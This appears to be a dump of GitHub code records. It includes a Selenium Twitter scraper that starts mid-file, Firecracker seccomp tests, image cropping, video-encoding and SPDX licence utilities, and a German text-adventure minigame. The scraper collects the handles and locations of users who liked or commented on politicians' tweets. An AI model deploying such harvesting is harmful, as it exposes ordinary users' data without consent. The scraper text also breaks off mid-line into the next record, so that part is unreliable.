bot.find_element_by_xpath(\"//a[@data-testid='AccountSwitcher_Logout_Button']\").click()\n\n time.sleep(3)\n\n try:\n bot.find_element_by_xpath(\"//div[@data-testid='confirmationSheetConfirm']\").click()\n except common.exceptions.NoSuchElementException:\n time.sleep(3)\n bot.find_element_by_xpath(\"//div[@data-testid='confirmationSheetConfirm']\").click()\n\n time.sleep(3) \n self.is_logged_in = False\n\n\n # usersList为[realcaixia, JoeBiden]\n # 返回[Tweets]\n def getAndWriteUserTweets(self, usersList, outputTweetsPath):\n bot = self.bot\n TweetsList = []\n for user in usersList:\n userPage = self.urlPrefix + user\n bot.get(userPage)\n time.sleep(3)\n scrollDown(bot)\n thisUserTweetsList = getUserTweets(bot, user)\n print(len(thisUserTweetsList))\n writeTweetsToCSV(thisUserTweetsList, outputTweetsPath)\n print('----------------------正在写入----------------------')\n TweetsList.append(thisUserTweetsList)\n print('全部一级用户Tweets已写入外部文件')\n return TweetsList\n\n # 输入usersList为一级用户List\n # 二级用户即给一级用户点赞评论的用户\n def getSecondLevelUsers(self, usersList):\n bot = self.bot\n SecondLevelUsers = []\n for user in usersList:\n # 进入当前用户主页\n userPage = self.urlPrefix + user\n bot.get(userPage)\n scrollDown(bot)\n time.sleep(3)\n\n articlesLink, articlesLikesLink = getUserTweetsAndLikesLink(bot)\n for articlesLink, articlesLike in zip(articlesLink, articlesLikesLink):\n # 获取评论用户\n bot.get(articlesLink)\n scrollDown(bot)\n time.sleep(3)\n commentUsers = getCommentUsers(bot, user)\n\n # 获取点赞用户\n bot.get(articlesLike)\n scrollDown(bot)\n time.sleep(3)\n\n likeUsers = getLikeUser(bot, user)\n SecondLevelUsers.extend([item for item in likeUsers])\n SecondLevelUsers.extend([item for item in commentUsers])\n # 去重\n return list(set(SecondLevelUsers))\n \n # # 从articlesLink中检索评论用户\n\n\n\n # https://twitter.com/JoeBiden 后边为用户id\n # 获取给用户userId近期推文点赞的用户id,返回list\n def searchLikesUsers(self, userId='', outputPath=''):\n bot = self.bot\n personPage = 'https://twitter.com/' + userId\n bot.get(personPage)\n\n\n time.sleep(5)\n articleList = bot.find_elements(By.XPATH, r'//a[@class=\"css-4rbku5 css-18t94o4 css-901oao r-14j79pv r-1loqt21 r-xoduu5 r-1q142lx r-1w6e6rj r-37j5jr r-a023e6 r-16dba41 r-9aw3ui r-rjixqe r-bcqeeo r-3s2u2q r-qvutc0\"]')\n urls_before = articleList\n # urls_before = articleList.find_elements(By.XPATH, r'//a')\n urls_after = []\n # # 推文链接为https://twitter.com/realcaixia/status/1401129211138658308\n # containKeys = userId + '/' + 'status'\n # notcontainKeys = 'photo'\n for url in urls_before:\n urlArray = url.get_attribute('href')\n urls_after.append(urlArray)\n print(urls_after)\n\n\n allUsers = []\n for url in urls_after:\n urlLikes = url + '/' + 'likes'\n bot.get(urlLikes)\n time.sleep(5)\n userSpans = bot.find_elements(By.XPATH, r\"//span[@class='css-901oao css-16my406 r-poiln3 r-bcqeeo r-qvutc0']\")\n for span in userSpans:\n thisSpanUser = span.get_attribute('innerHTML')\n if thisSpanUser.startswith('@') and thisSpanUser != ('@'+ self.userName):\n allUsers.append(thisSpanUser)\n print('本次获取到的点赞用户数量为:')\n print(len(list(set(allUsers))))\n write_csv(outputPath, list(set(allUsers)))\n print('以将用户列表保存到本地指定路径!!!')\n return list(set(allUsers))\n \n # normal\n # urlTest = urls_after[0]\n # urlTest = 'https://twitter.com/realcaixia/status/1401129211138658308'\n # urlLike = urlTest + '/' + 'likes'\n # bot.get(urlLike)\n # time.sleep(5)\n\n # userIdList中的userId均以@开头\n # https://twitter.com/userId为该用户主页\n def searchForLikesUsersTweetsAndLocation(self, userIdsPath):\n bot = self.bot\n\n # 从本地文件读取userIdsList\n userIdsList = read_csv(userIdsPath)\n print(userIdsList)\n userIdsList = ['realcaixia', 'JoeBiden']\n\n userId = 'realcaixia'\n userPage = 'https://twitter.com' + '/' + userId\n bot.get(userPage)\n time.sleep(5)\n try:\n userLocationSpan = bot.find_element(By.XPATH, r'/html/body/div[1]/div/div/div[2]/main/div/div/div/div[1]/div/div[3]/div/div/div/div/div[4]/div/span[1]/span/span')\n userLocation = userLocationSpan.get_attribute('innerHTML')\n except:\n userLocation = 'Not Found'\n\n print(userLocation)\n\n # userInformationDiv = bot.find_element(By.XPATH, r'/html/body/div[1]/div/div/div[2]/main/div/div/div/div[1]/div/div[3]/div/div/div/div/div[3]/div/div[1]')\n # userInformationSpan = userInformationDiv.find_elements(By.TAG_NAME, r'span')\n # userInformation = ''\n # for span in userInformationSpan:\n # infor = span.get_attribute('innerHTML')\n # if infor.startswith('= 1\n\n # assert that the process was killed\n assert not psutil.pid_exists(test_microvm.firecracker_pid)\n\n\n@pytest.mark.parametrize(\"vm_config_file\", [\"framework/vm_config.json\"])\ndef test_invalid_bpf(test_microvm_with_api, vm_config_file):\n \"\"\"\n Test that FC does not start, given an invalid binary filter.\n \"\"\"\n test_microvm = test_microvm_with_api\n\n # Configure VM from JSON. Otherwise, the test will error because\n # the process will be killed before configuring the API socket.\n _config_file_setup(test_microvm_with_api, vm_config_file)\n\n bpf_path = os.path.join(test_microvm.path, \"bpf.out\")\n file = open(bpf_path, \"w\", encoding=\"utf-8\")\n file.write(\"Invalid BPF!\")\n file.close()\n\n test_microvm.create_jailed_resource(bpf_path)\n test_microvm.jailer.extra_args.update({\"seccomp-filter\": \"bpf.out\"})\n\n test_microvm.spawn()\n\n # give time for the process to get killed\n time.sleep(1)\n\n # assert that the process was killed\n assert not psutil.pid_exists(test_microvm.firecracker_pid)\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/integration_tests/security/test_custom_seccomp.py","file_name":"test_custom_seccomp.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"20908588533","text":"import cv2\nimport numpy as np\nimport os\nfrom math import ceil\n\n# param\n# aligned_img_gray is a grayscale 2D numpy image array\n# -- will be the output of preproc_align_image() \n# page_number is 1,2,3, or 4\n# return\n# return True\n# will create a new directory containing appropariately named 3D PNG/JPG images -\n# - of all the individual cropped ROIs\ndef preproc_roi_output(aligned_img_gray, page_number):\n\n # EDIT AS NECESSARY\n curr_path = os.getcwd() #curr_path is the same folder where the original picture is\n new_path = os.path.join(curr_path, 'ROI_crops')\n try:\n os.mkdir(new_path)\n print(\"Created directory\", new_path)\n except:\n print(\"Warning:\", new_path, \"directory already exists, overwriting files...\")\n #cv2.imwrite(\"ROI_crops/homography_out.png\",cv2.cvtColor(aligned_img_gray,cv2.COLOR_GRAY2BGR))\n\n img = aligned_img_gray\n\n \"\"\"\n img_copy = aligned_img_gray.copy()\n img_copy = cv2.cvtColor(img_copy,cv2.COLOR_GRAY2RGB)\n counter = 0\n bgr_colors = ((255,0,0,),(0,255,0),(0,0,255))\n \"\"\"\n\n dimension = img.shape\n\n height = dimension[0]\n width = dimension[1]\n \n f = open(\"../\" + \"ROI_list_page\" + str(page_number) + \".txt\", \"r\")\n content = f.readlines()\n\n for line in content:\n data = line.split()\n topleft_x = ceil(width * float(data[1]))\n topleft_y = ceil(height * float(data[2]))\n bottomright_x = ceil(width * float(data[3]))\n bottomright_y = ceil(height * float(data[4]))\n\n #print(data[0], topleft_x,topleft_y,bottomright_x,bottomright_y)\n \"\"\"\n new_corners = np.array([[\n [topleft_x, topleft_y],\n [bottomright_x, topleft_y],\n [bottomright_x, bottomright_y],\n [topleft_x, bottomright_y]\n ]])\n \n if(not counter%3):\n cv2.drawContours(img_copy, new_corners, -1, bgr_colors[counter%3], 3)\n counter += 1\n \"\"\"\n crop_img = img[topleft_y:bottomright_y, topleft_x:bottomright_x]\n cv2.imwrite(\"ROI_crops/\"+data[0]+\".png\", crop_img)\n\n #cv2.imwrite(\"garp1_some_ROI.jpg\",img_copy)\n print(\"ROI Cropping Complete\")\n return True\n\nif __name__ == \"__main__\":\n\n dir_of_data = 'samples'\n file_used = 'garp1_new.jpg' #page3\n page_number = 1\n \n curr_dir = os.getcwd()\n os.chdir(os.path.join(curr_dir, dir_of_data))\n #print(os.getcwd())\n \n aligned_img_color = cv2.imread(file_used,cv2.IMREAD_COLOR)\n aligned_img_gray = cv2.imread(file_used,cv2.IMREAD_GRAYSCALE)\n\n #cv2.imshow(file_used + \" - \" + str(page_number),aligned_img_gray)\n\n preproc_roi_output(aligned_img_gray, page_number)\n","repo_name":"josei1354/ECE-COE-199","sub_path":"src/preproc/roi_cropping.py","file_name":"roi_cropping.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17763085453","text":"#!/usr/bin/env python\nfrom time import sleep\n\nimport bitcodin\n\nbitcodin.api_key = 'YOUR API KEY'\n\ninput_obj = bitcodin.Input(url='http://bitbucketireland.s3.amazonaws.com/Sintel-original-short.mkv')\ninput_result = bitcodin.create_input(input_obj)\n\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000)]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests\n)\njob_result = bitcodin.create_job(job)\nprint(\"Started Job with id %d\\n\" % job_result.job_id)\n\nwhile job_result.status != 'Finished' and job_result.status != 'Error':\n job_result = bitcodin.get_job(job_result.job_id)\n print(job_result.to_json())\n sleep(5)\n\n\nsubtitles = list()\nsub_de = bitcodin.VttSubTitle('de', 'Deutsch', 'http://your.url/to/de_sub.vtt')\nsub_eng = bitcodin.VttSubTitle('eng', 'English', 'http://your.url/to/eng_sub.vtt')\nsubtitles.append(sub_de)\nsubtitles.append(sub_eng)\n\nvtt_mpd_request = bitcodin.VttMpdRequest(job_result.job_id, subtitles)\n\nres = bitcodin.create_vtt_mpd(vtt_mpd_request)\nprint(res.mpd_url)\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_vtt_mpd.py","file_name":"create_vtt_mpd.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"42808959915","text":"import gzip\nimport os\nfrom io import BytesIO\n\nimport jpype\nimport requests\n\n\ndef colors(string, color):\n \"\"\"To make things colorful\n\n Arguments:\n string {string} -- string to be colored.\n color {integer} -- color\n \"\"\"\n return(\"\\033[%sm%s\\033[0m\" % (color, string))\n\n\ndef decompressBytesToString(inputBytes):\n \"\"\"Decompress the given byte array (which must be valid\n compressed gzip data) and return the decoded text (utf-8).\n\n Arguments:\n inputBytes {bytes} -- A valid compressed gzip byte array\n\n Returns:\n string -- utf-8 decoded text\n \"\"\"\n buf = BytesIO()\n stream = BytesIO(inputBytes)\n decompressor = gzip.GzipFile(fileobj=stream, mode='r')\n while True: # until EOF\n chunk = decompressor.read(8192)\n if not chunk:\n decompressor.close()\n buf.seek(0)\n return buf.read().decode(\"utf-8\")\n buf.write(chunk)\n return None\n\n\ndef compressStringToBytes(inputString):\n \"\"\"Read the given string, encode it in utf-8, compress\n the data and return it as a byte array.\n\n Arguments:\n inputString {[type]} -- inputString is the license text of the license.\n\n Returns:\n byte -- A compressed gzip byte array.\n \"\"\"\n buf = BytesIO()\n buf.write(inputString.encode(\"utf-8\"))\n buf.seek(0)\n stream = BytesIO()\n compressor = gzip.GzipFile(fileobj=stream, mode='w')\n while True: # until EOF\n chunk = buf.read(8192)\n if not chunk: # EOF?\n compressor.close()\n return stream.getvalue()\n compressor.write(chunk)\n\n\ndef getListedLicense(licenseId):\n \"\"\"Get a SPDX listed license if the given SPDX license ID is present in the SPDX license list otherwise null.\n\n Arguments:\n licenseId {string} -- SPDX listed license ID\n\n Returns:\n string -- SPDX listed license or null\n \"\"\"\n if (jpype.isJVMStarted()==0):\n\n # If JVM not already started, start it, attach a Thread and start processing the request\n dirpath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n classpath = os.path.join(dirpath, \"tool.jar\")\n jpype.startJVM(jpype.getDefaultJVMPath(), \"-ea\", \"-Djava.class.path=%s\"%classpath)\n\n # Attach a Thread and start processing the request\n jpype.attachThreadToJVM()\n package = jpype.JPackage(\"org.spdx.library.model.license\")\n licenseinfofactoryclass = package.LicenseInfoFactory\n try:\n\n # Call the method getListedLicenseById present in the SPDX Tools\n listed_license = licenseinfofactoryclass.getListedLicenseById(licenseId)\n jpype.detachThreadFromJVM()\n return listed_license\n except:\n jpype.detachThreadFromJVM()\n raise\n\n\ndef checkTextStandardLicense(license, compareText):\n \"\"\"Compares the license text to the license text of SPDX Standard License.\n\n Arguments:\n license {string} -- SPDX standard license.\n compareText {string} -- Text to compare with the standard license.\n\n Returns:\n string -- Difference message if any differences found or None.\n \"\"\"\n\n if (jpype.isJVMStarted()==0):\n\n # If JVM not already started, start it, attach a Thread and start processing the request\n dirpath = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n classpath = os.path.join(dirpath, \"tool.jar\")\n jpype.startJVM(jpype.getDefaultJVMPath(), \"-ea\", \"-Djava.class.path=%s\"%classpath)\n\n # Attach a Thread and start processing the request\n jpype.attachThreadToJVM()\n package = jpype.JPackage(\"org.spdx.utility.compare\")\n compareclass = package.LicenseCompareHelper\n try:\n\n # Call the java method isTextStandardLicense present in the SPDX Tools\n diff = compareclass.isTextStandardLicense(license, compareText)\n isDifferenceFound = jpype.JBoolean(diff.isDifferenceFound())\n jpype.detachThreadFromJVM()\n return isDifferenceFound\n except:\n jpype.detachThreadFromJVM()\n raise\n\n\ndef get_spdx_license_text(licenseId):\n \"\"\"Get the SPDX license text of the closely matched license.\n\n Arguments:\n licenseId {string} -- License Id of the closely matched license.\n\n Returns:\n string -- returns the spdx license text.\n \"\"\"\n try:\n res = requests.get('https://spdx.org/licenses/{}.json'.format(licenseId))\n res.raise_for_status()\n except requests.exceptions.HTTPError as e:\n raise\n except requests.exceptions.RequestException as e:\n raise\n return res.json()['licenseText']\n","repo_name":"spdx/spdx-license-matcher","sub_path":"spdx_license_matcher/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"20186162084","text":"import ace\nimport json\nimport unittest\n\n\nclass AceParsingTestCase(unittest.TestCase):\n input = ''\n output = {}\n\n def setUp(self):\n self.maxDiff = 10000\n self.app = ace.app.test_client()\n\n def runTest(self):\n res = self.app.post('/parse', data={'message': self.input})\n self.assertEqual(json.loads(res.data), self.output)\n\n\nclass SimpleMentiontest(AceParsingTestCase):\n input = '@chris you around?'\n output = {\n 'mentions': [\n 'chris'\n ]\n }\n\n\nclass MultiMentionTest(AceParsingTestCase):\n input = ' @marty marty @tim @tim joe '\n output = {\n 'mentions': [\n 'marty',\n 'tim',\n 'tim'\n ]\n }\n\n\nclass SimpleEmoticonTest(AceParsingTestCase):\n input = 'Good morning! (megusta) (coffee)'\n output = {\n 'emoticons': [\n 'megusta',\n 'coffee'\n ]\n }\n\n\nclass MultiEmoticonTest(AceParsingTestCase):\n input = '(coffee) (coffee) (coffee)'\n output = {\n 'emoticons': [\n 'coffee',\n 'coffee',\n 'coffee'\n ]\n }\n\n\nclass ParenthesizedMentionNotParsed(AceParsingTestCase):\n input = 'hey (@foobar) hey'\n output = {}\n\n\nclass NoTitleForNonexistentLink(AceParsingTestCase):\n input = 'this is bad @marty: http://kjwekjtwet'\n output = {\n 'mentions': [\n 'marty'\n ],\n 'links': [\n {\n 'url': 'http://kjwekjtwet',\n 'title': ace.ace.TEXT_FOR_UNAVAIL_TITLE\n }\n ]\n }\n\n\nclass SimpleLinkTest(AceParsingTestCase):\n input = 'Olympics are starting soon; http://www.nbcolympics.com'\n output = {\n \"links\": [\n {\n \"url\": \"http://www.nbcolympics.com\",\n \"title\": \"2018 PyeongChang Olympic Games | NBC Olympics\"\n }\n ]\n }\n\n\nclass AllTokenTypesTest(AceParsingTestCase):\n input = '@bob @john (success) such a cool feature; https://twitter.com/jdorfman/status/430511497475670016'\n output = {\n \"mentions\": [\n \"bob\",\n \"john\"\n ],\n \"emoticons\": [\n \"success\"\n ],\n \"links\": [\n {\n \"url\": \"https://twitter.com/jdorfman/status/430511497475670016\",\n \"title\": \"Justin Dorfman on Twitter: "nice @littlebigdetail from @HipChat (shows hex colors when pasted in chat). http://t.co/7cI6Gjy5pq"\"\n }\n ]\n }\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"woodlee/ace","sub_path":"test_ace.py","file_name":"test_ace.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23903473091","text":"import Source.EngineL.Core as Core\n\nclass BigHeap(Core.StaticEntity):\n \"\"\"\n The big Heap\n \"\"\"\n\n def __init__(self, parent=None):\n Core.StaticEntity.__init__(self, parent)\n self.setObjectName(\"großer Haufen\")\n self.description = \"Dieser große Haufen verstopft den Fluss, er macht den Weg zum Hafen\\\n unzugängig und bedroht das Dorf!\"\n self.gender = \"m\"\n self.activly_usable = True\n self.set_state(\"used\", 0)\n\n def on_used(self, user, other_entity=None):\n if other_entity is None and self.get_state(\"used\") == 0:\n user.get_window().show_text(\"Ach nein! Der Müll steckt ziemlich fest, es tut sich\\\n einfach überhaupt nichts. Ich versuch' es gleich nochmal.\")\n self.set_state(\"used\", 1)\n return True\n if other_entity is None and self.get_state(\"used\") == 1:\n user.get_window().show_text(\"Es tut sich was! Ich glaub ich hab die Schwachstelle\\\n gefunden. Ein präziser Tritt und das Dorf ist gerettet.\")\n self.set_state(\"used\", 2)\n return True\n if other_entity is None and self.get_state(\"used\") == 2:\n user.get_window().show_text(\"WOAH!!! Ich sollte vorsichtiger sein, fast hätte mich die\\\n Strömung mit gerissen. Frei ist der Fluss jetzt auch noch nicht, aber ich glaub' da\\\n hat sich was getan.\")\n self.set_state(\"used\", 3)\n return True\n if other_entity is None and self.get_state(\"used\") == 3:\n user.get_window().show_text(\"Jawoll, der Wasserspiegel senkt sich, jedoch wird noch\\\n immer Müll angespült, der in der Lage ist, den Fluss in einen riesigen Damm zu\\\n verwandeln. Ich sollte schnell was dagegen, unternehmen bevor sich erneut was ansammeln\\\n kann!\")\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.spawn(\"trash\")\n self.transfer(None)\n return True\n return False\n\nclass Trash(Core.StaticEntity):\n \"\"\"\n The big Heap\n \"\"\"\n\n def __init__(self, parent=None):\n Core.StaticEntity.__init__(self, parent)\n self.setObjectName(\"Müll\")\n self.description = \"Der Müll muss noch immer vom Berg bis hierhin angespült worden sein.\"\n self.gender = \"m\"\n self.activly_usable = True\n self.set_state(\"used\", 0)\n self.show_article = False\n def on_used(self, user, other_entity=None):\n if other_entity is None and self.get_state(\"used\") == 0:\n user.get_window().show_text(\"Schön langsam, Ivy. Nur weil du den Müll ans Ufer ziehst\\\n musst du nicht gleich im Fluss baden gehen.\")\n self.set_state(\"used\", 1)\n return True\n if other_entity is None and self.get_state(\"used\") == 1:\n user.get_window().show_text(\"Wie viel Müll kommt da denn noch! Irgendwie habe ich mir\\\n den Tag anders vorgestellt.\")\n self.set_state(\"used\", 2)\n return True\n if other_entity is None and self.get_state(\"used\") == 2:\n user.get_window().show_text(\"Wir sollten aufhören unseren Müll auf dem Berg zu lagern,\\\n denn das was hier angespült wird, muss schon mehrere Jahrer dort oben liegen\")\n self.set_state(\"used\", 3)\n return True\n if other_entity is None and self.get_state(\"used\") == 3:\n user.get_window().show_text(\"Moment mal. Das könnte sich vielleicht als nützlich\\\n erweisen und mir die Arbeit erleich... AUFPASSEN! Ich hab wohl gepennt und nicht\\\n gesehen, dass noch immer Müll angeschwemmt wird und erneut ist der Fluss verstopft!\")\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.spawn(\"shovel\")\n road_to_habour.spawn(\"dam\")\n self.transfer(None)\n return True\n return False\n\nclass Shovel(Core.Entity):\n \"\"\"\n The shovel\n \"\"\"\n def __init__(self, parent=None):\n Core.Entity.__init__(self, parent)\n self.setObjectName(\"Schaufel\")\n self.description = \"Eine alte Schaufel. Jemand muss sie bei der Suche nach Ressourcen oben\\\n auf dem Berg vergessen haben.\"\n self.gender = \"f\"\n\nclass Dam(Core.StaticEntity):\n \"\"\"\n The dam\n \"\"\"\n\n def __init__(self, parent=None):\n Core.StaticEntity.__init__(self, parent)\n self.setObjectName(\"Damm\")\n self.description = \"Dieser Damm ist noch größer als der Haufen an Müll von vorhin. Jetzt\\\n zählt jede Sekunde!\"\n self.gender = \"m\"\n self.activly_usable = True\n self.set_state(\"used\", 0)\n\n def on_used(self, user, other_entity=None):\n if other_entity is None and self.get_state(\"used\") == 0:\n user.get_window().show_text(\"Mit meinen bloßen Händen kann das eine Weile dauern.\")\n self.set_state(\"used\", 1)\n return True\n if other_entity is None and self.get_state(\"used\") == 1:\n user.get_window().show_text(\"Ok, ok. Bis auf den Schmerz in meinen Armen und die\\\n Tatsache, dass das Wasser gleich das Dorf erreicht, ist doch alles bestens.\")\n self.set_state(\"used\", 2)\n return True\n if other_entity is None and self.get_state(\"used\") == 2:\n user.get_window().show_text(\"Meine Hände sind nicht gerade so effektiv, wie eine\\\n Schaufel, doch zumindest ist der Damm jetzt fast gebrochen.\")\n self.set_state(\"used\", 3)\n return True\n if other_entity is None and self.get_state(\"used\") == 3:\n user.get_window().show_text(\"GESCHAFFT! Das Dorf ist nicht mehr bedroht und ich kann\\\n endlich wieder zum Hafen, aber warum habe ich nicht die Schaufel von da drüben\\\n benutzt?\")\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.set_state(\"flooded\", 0)\n self.transfer(None)\n return True\n if isinstance(other_entity, Shovel) and self.get_state(\"used\") <= 1:\n user.get_window().show_text(\"Mit der Schaufel geht das ja kinderleicht, nicht viel mehr\\\n und der Damm ist gebrochen!\")\n self.set_state(\"used\", (self.get_state(\"used\"))+2)\n return True\n if isinstance(other_entity, Shovel) and self.get_state(\"used\") >= 2:\n user.get_window().show_text(\"GESCHAFFT! Das Dorf ist nicht mehr bedroht und ich kann\\\n endlich wieder zum Hafen. Die Schaufel ist jedoch hinüber.\")\n other_entity.transfer(None)\n rth_name = Core.get_res_man().get_string(\"game.places.roadToHabour.name\")\n road_to_habour = Core.SinglePlayerApp.instance().findChild(Core.Place, rth_name)\n road_to_habour.set_state(\"cleared\", 1)\n return True\n return False\n\ndef register_entity_classes(app):\n \"\"\"\n This function registers all of our new Entity classes to the given application instance.\n \"\"\"\n app.register_entity_classes([BigHeap, Trash, Shovel, Dam])\n","repo_name":"ProjectL-Team/ProjectL","sub_path":"Source/Minigame.py","file_name":"Minigame.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20595679621","text":"import argparse\nimport hashlib\nimport json\nimport math\nimport os\nimport re\nimport stat\nimport sys\nimport time\nimport uuid\n\nUNPACK_TOOL_VERSION = \"4.0.6\"\n\nclass Util:\n \"\"\"\n Class with static helper functions\n \"\"\"\n LOG_FILE = \"./fwpkg_unpack_log.txt\"\n LOGFILE_PATH = \"\"\n\n @staticmethod\n def cli_log(log_msg, log_file_only=False):\n \"\"\"\n Append log message to cli log file\n \"\"\"\n log_file = Util.LOG_FILE\n\n file_handle = None\n try:\n with open(log_file, \"a+\", encoding=\"utf-8\") as file_handle:\n localtime = time.asctime(time.localtime(time.time()))\n file_handle.write(f\"{localtime} : {log_msg}\\n\")\n Util.LOGFILE_PATH = os.path.abspath(file_handle.name)\n if log_file_only is False:\n print(log_msg)\n except PermissionError as _:\n print(log_msg)\n print(f\"Error: Failed to open or create {log_file}\")\n\n @staticmethod\n def get_descriptor_type_name(desc_type):\n \"\"\"\n Return the descriptive name for given integer descriptor type.\n \"\"\"\n desc_type_dict = {\n 0x0000: \"PCI Vendor ID\",\n 0x0001: \"IANA Enterprise ID\",\n 0x0002: \"UUID\",\n 0x0003: \"PnP Vendor ID\",\n 0x0004: \"ACPI Vendor ID\",\n 0x0005: \"IEEE Assigned Company ID\",\n 0x0006: \"SCSI Vendor ID\",\n 0x0100: \"PCI Device ID\",\n 0x0101: \"PCI Subsystem Vendor ID\",\n 0x0102: \"PCI Subsystem ID\",\n 0x0103: \"PCI Revision ID\",\n 0x0104: \"PnP Product Identifier\",\n 0x0105: \"ACPI Product Identifier\",\n 0x0106: \"ASCII Model Number\",\n 0x0107: \"ASCII Model Number\",\n 0x0108: \"SCSI Product ID\",\n 0x0109: \"UBM Controller Device Code\",\n 0xffff: \"Vendor Defined\",\n }\n\n name = desc_type_dict.get(desc_type, f'{desc_type:#x}')\n return name\n\n @staticmethod\n def get_timestamp_str(timestamp):\n \"\"\"\n Return timestamp string from 13 byte binary data\n according to PLDM Base specification\n \"\"\"\n year = timestamp[11]\n year = year << 8\n year = year | timestamp[10]\n time_str = str(year) + \"-\"\n time_str = time_str + str(timestamp[9])\n time_str = time_str + \"-\" + str(timestamp[8])\n time_str = time_str + \" \" + str(timestamp[7])\n time_str = time_str + \":\" + str(timestamp[6])\n time_str = time_str + \":\" + str(timestamp[5])\n micro_sec = timestamp[4]\n micro_sec = micro_sec << 8\n micro_sec = micro_sec | timestamp[3]\n micro_sec = micro_sec << 8\n micro_sec = micro_sec | timestamp[2]\n time_str = time_str + \":\" + str(micro_sec)\n utc_offset = timestamp[1]\n utc_offset = utc_offset << 8\n utc_offset = utc_offset | timestamp[0]\n sign = \"+\"\n if utc_offset < 0:\n utc_offset = utc_offset * -1\n sign = \"-\"\n time_str = time_str + \" \" + sign + str(utc_offset)\n return time_str\n\n @staticmethod\n def get_checksum_for_component_image(fw_image):\n \"\"\"\n Compute SHA256 for the given component image.\n \"\"\"\n sha256 = \"\"\n try:\n with open(fw_image, 'rb') as file_name:\n data = file_name.read()\n sha256 = hashlib.sha256(data).hexdigest()\n except (FileNotFoundError, IOError) as err:\n log_msg = f'Error: {err}'\n Util.cli_log(log_msg, False)\n return sha256\n\n @staticmethod\n def get_padded_hex(byte_arr):\n \"\"\"\n Get hex formatted version of a byte array padded with 0\n \"\"\"\n total_len = len(byte_arr)\n hex_str = hex(\n int.from_bytes(byte_arr, byteorder='little', signed=False))[2:]\n padded_str = '0x' + hex_str.zfill(total_len * 2)\n return padded_str\n\n\nclass PLDMUnpack:\n # pylint: disable=too-many-instance-attributes\n \"\"\"\n PLDMUnpack class implements a PLDM parser and the unpack tool\n along with its required features.\n ...\n Attributes\n ----------\n package : str\n Path/Name of the input firmware package\n unpack : bool\n True if tool should unpack firmware images\n fwpkg_fd : io.TextIOWrapper\n Instance used to read from package file\n header_map : dict\n Stores the PLDM Package Header Information parsed from given package\n device_id_record_count : int\n Number of PLDM FirmwareDeviceIDRecords found in given package\n fd_id_record_list : list\n List of FirmwareDeviceIDRecords parsed from given package\n component_img_info_list : list\n List of ComponentImageInformation parsed from given package\n\n Methods\n -------\n parse_header() :\n Parses PLDM Package Header Information\n parse_device_id_records() :\n Parses FirmwareDeviceIDRecords from package\n parse_component_img_info() :\n Parses ComponentImageInformation from package\n get_image_name_from_records(comp_info_index) :\n Identify records which which contain metadata for image naming\n get_image_name(comp_info_index) :\n Get image name string by appending various metadata\n create_unpacked_files(output_dir) :\n Extract each firmware image in a file\n unpack_pldm_package(package_name, output_dir) :\n Perform complete parsing and extraction of package\n get_applicable_component_index(applicable_component):\n Return applicable_component as list of indices\n get_ec_info(filepath) :\n Get all EC metadata from extraxted firmware\n get_ap_metadata(filepath) :\n Get all AP metadata from extraxted firmware\n get_signature_type(fw_image, component_identifier):\n Get Signature type for given firmware image and component identifier\n is_glacier_device(product, device_name):\n Is this device a glacer device\n get_formatted_descriptors(record_desc, components):\n Method to prepare descriptor section for json output\n prepare_records_json():\n Prepares the JSON output.\n\n \"\"\"\n def __init__(self):\n \"\"\"\n Contructor for PLDMUnpack class\n \"\"\"\n self.unpack = True\n self.package = \"\"\n self.fwpkg_fd = 0\n self.header_map = {}\n self.device_id_record_count = 0\n self.fd_id_record_list = []\n self.component_img_info_list = []\n self.full_header = {\n \"PackageHeaderInformation\": {},\n \"FirmwareDeviceIdentificationArea\": {},\n \"ComponentImageInformationArea\": {},\n \"Package Header Checksum\": ''\n }\n self.verbose = False\n self.little_endian_list = [\n \"IANA Enterprise ID\", \"PCI Vendor ID\", \"PCI Device ID\",\n \"PCI Subsystem Vendor ID\", \"PCI Subsystem ID\"\n ]\n\n def parse_header(self):\n \"\"\"\n Parse PLDM header data into self.header_map\n Returns :\n True if parsing successful\n \"\"\"\n # check if UUID is valid\n pldm_fw_header_id_v1_0 = 